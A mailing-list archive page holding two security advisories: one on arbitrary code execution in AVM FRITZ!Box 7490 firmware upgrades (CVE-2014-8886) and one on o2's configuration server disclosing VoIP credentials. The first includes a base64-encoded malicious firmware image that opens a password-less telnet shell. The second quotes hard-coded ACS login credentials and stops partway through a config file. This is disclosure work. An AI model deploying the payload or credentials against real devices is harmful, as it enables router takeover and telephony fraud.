[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH 
Advisory: AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated
  Firmware Images

The firmware upgrade process of the FRITZ!Box 7490 is flawed. Specially
crafted firmware images can overwrite critical files. Arbitrary code can
get executed if an attempt is made to install such a manipulated
firmware.


Details
===

Product: AVM FRITZ!Box 7490, possibly others
Affected Versions: versions prior to 6.30 [0]
Fixed Versions: >= 6.30 [0]
Vulnerability Type: Authenticated Code Execution
Security Risk: medium
Vendor URL: http://avm.de/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-014
Advisory Status: published
CVE: CVE-2014-8886
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8886


Introduction


FRITZ!Box is the brand name of SOHO routers/CPE manufactured by AVM
GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a
wifi access point, routing, VoIP, NAS and DECT.


More Details


AVM regularly publishes firmware updates to address bugs and to
introduce new features. The firmware image can either be uploaded
manually or the FRITZ!Box downloads it semi-automatically from
http://download.avm.de/ via unencrypted HTTP if a new version is
available.

Technically, AVM firmware images are tar files:

$ tar --list --file FRITZ.Box_7490.113.06.20.image
./var/
./var/install
./var/chksum
./var/info.txt
./var/tmp/
./var/tmp/filesystem.image
./var/tmp/kernel.image
./var/regelex
./var/signature

When transferred to the FRITZ!Box, updates are extracted to the root
directory before their cryptographic signature is verified. Thus,
critical files can be overwritten by specially crafted firmware images.
Attackers can use this weakness to execute arbitrary code.

For example, the root directory of the web interface is located at
/var/html (ramdisk), which is a symlink that points to /usr/www/avm
(read-only squashfs). If the victim uploads a tar file that contains a
symlink called ./var/html, the web server's root directory is relocated
to whatever the malicious symlink points to, e.g. ./var/redteam. There,
attackers can place arbitrary content, such as CGIs. Once invoked by a
browser, arbitrary code can be executed.

As the signature check will inevitably fail, the victim will be asked
whether the unsigned firmware image should be processed or not. That
confirmation page is formatted by CSS. As a result, the victim's browser
will try to reload the main.css, which is now under the control of the
attacker. The attacker can manipulate the main.css to trick the victim's
browser into loading an attacker-controlled CGI. In total, the upload of
a manipulated firmware image can immediately lead to code execution
without the need of further action by the victim.


Proof of Concept


The following command generates a firmware image that leads to code
execution when uploaded to a FRITZ!Box 7490. As soon as the FRITZ!Box
reports the signature mismatch, a password-less telnetd listening on
port  will be started.


$ base64 -d < poc.image
H4sICGITeVYAA3BvYy5pbWFnZQDt1dtunDAQBmCueYoJUaX2AgwsLMruKjd9jd4YPBwUYyPb
JI2qvnsNOQhVWuWiOajKfGLFwUb+2dFAwm65Yb0bZfBmUq+qqmWfVWW63T95Pi7yXZBmxS7f
B5Cv2QwKh3x8q3CzddwABD1XPQ7n5700/p9Ktv8xa7ohrgfFJt284hoP9S/P1r9I90GWF1lV
+F+5X+pf7fIA0lfMcNYnr//lBVsKbvuQzdYwu5w4lAqdgFjC4yDEE1x54c0gJZcS2sGMd9xg
03YhNr2GGCH6rpVD5WJ3P+EBHP50bJJ8UD9U9DhJQXRa3jXXp1qL++vN5Ylbe6eNiCVaC08J
em6hRlSwFMmhAO5g0satYRJYkgzKj6kGLeh2G8vfe4sPNy+hUSTbEGxd/7S++HyMj67Cx/mr
/61lAls+S8dGX7nEX/j3Ndb+L8/3f7Yrnvs/9Y2fZvuyqKj/38PSAPArrHlz0xk9KxE3Wmpz
gMu2bbEWx9A/dde7A6Rfjttpw8g73+WzkV+jJGF+23w8om/H8Pcn7ipCCCGEEEIIIYQQQggh
hBBCCCHkff0BF28hMgAoAAA=
EOF



Workaround
==

Check each firmware image manually for suspicious file names, before
uploading to the FRITZ!Box. A more precise workaround does not exist at
the moment.


Fix
===

Customers should upgrade to a fixed firmware version as soon as
possible. Before upgrading, they should check the new firmware image for
suspicious file names (see "Workaround").


Security Risk
=

This vulnerability allows an attacker to inject arbitrary code into AVM
firmware images. If the attacker is able to perform a man-in-the-middle
attack between the AVM FRITZ!Box and http://download.avm.de/, firmware
images can be manipulated in transit. Otherwise, attackers need to trick
their victims into installing a malicious firmware image. While
successful attacks result in the full compromise of a device, they would
typically require an attacker in a very strong position. The
vulnerability is therefore considered to pose a medium risk.


Timeline


2014-10-14 Vulnerability identified
2014-10-16 Vendor notified
2014-11-11 CVE requested
2014-11-11 Vendor announced patch
2014-11-14 CVE number assigned

[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH 
Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of
arbitrary customers when receiving manipulated CWMP packets. These
credentials can then be used by an attacker to register any VoIP number
of the victim. This enables the attacker to place and receive calls on
behalf of the attacked user.


Details
===

Product: o2 DSL Auto Configuration Server
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://o2online.de/
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


TR-069 (Technical Report 069) is a Broadband Forum technical
specification entitled "CPE WAN Management Protocol" (CWMP). It defines
an application layer protocol for remote management of end-user devices.

(from Wikipedia)

A more technical introduction to TR-069 can be found in a deck of slides
which the Interoperability Laboratory at the University of New Hampshire
has published on that topic [0].


More Details


The German Internet Service Provider o2 uses the TR-069 protocol for the
provisioning of Customer Premises Equipment (CPE). Among other settings,
VoIP/SIP credentials are transferred and VoIP telephony is set up.

In our setup, an AVM FRITZ!Box 7490 was monitored during the initial
autoconfiguration process. During that process, several CWMP messages
are exchanged. These CWMP messages are transferred via HTTPS as SOAP
requests and replies. The HTTPS connection is always established by the
CPE which connects to the Auto Configuration Server (ACS). According to
the CWMP, the CPE may do so on the occasion of several events,
including, but not limited to:

* BOOTSTRAP  - first contact between CPE and ACS
* BOOT   - when CPE has rebooted
* PERIODIC   - after a period of time, defined by the ACS
* CONNECTION REQUEST - ACS signals a connection request to the CPE via a
   second HTTP channel

The "CONNECTION REQUEST" is the only event that can be triggered by the
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the
CPE and authenticates via HTTP basic access authentication with a
"ConnectionRequestUsername" and a "ConnectionRequestPassword". No
further data is exchanged on that channel. Once the CPE has verified the
credentials, it then initiates the real CWMP conversation by sending a
CWMP-Inform message to the pre-defined ACS. The connection initiated by
the CPE is TLS-secured and the CPE provides a username
(ManagementServer.Username) and a password (ManagementServer.Password)
to authenticate itself towards the ACS.

A typical CWMP conversation (including the "CONNECTION REQUEST" event)
is depicted below:


   .Connection Request---.]
   | |]
   v |]
--. . ]---> HTTP
 |Port|   | | ]
 |8089|   | | ]
 `'   | |   ACS   ]
   |  | |
   |  | |.]
   `> |  ---Inform> ||]
  | <---InformResponse  ||]
  | ||]
  |  ---[empty]---> ||]
  | <---SetParameterValues  ||]
  | ||]
  |  ---SetParameterValuesResponse> |Port|]---> CWMP
  | <---SetParameterValues  | 443|](HTTPS)
  | ||]
   CPE|[...]||]
  | ||]
  |  ---SetParameterValuesResponse> ||]
  | <---[empty]---  ||]
  | ||]

During our research, it was observed that the ACS URL as well as
credentials for the initial connection to the ACS are hard-coded. On a
stock AVM FRITZ!Box, running the firmware version 6.20, these can be
found in the file ./providers/otwored/tr069.cfg which is part of the
archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For
o2/Telefonica these credentials are:

tr069cfg {
  enabled = yes;
  igd {
  DeviceInfo {
ProvisioningCode = "";
  }
  managementserver {
url = "https://acs.o2online.de/nbbs/tr69;;
username = "00040E-";
password = "o2acs";
URLAlreadyContacted = no;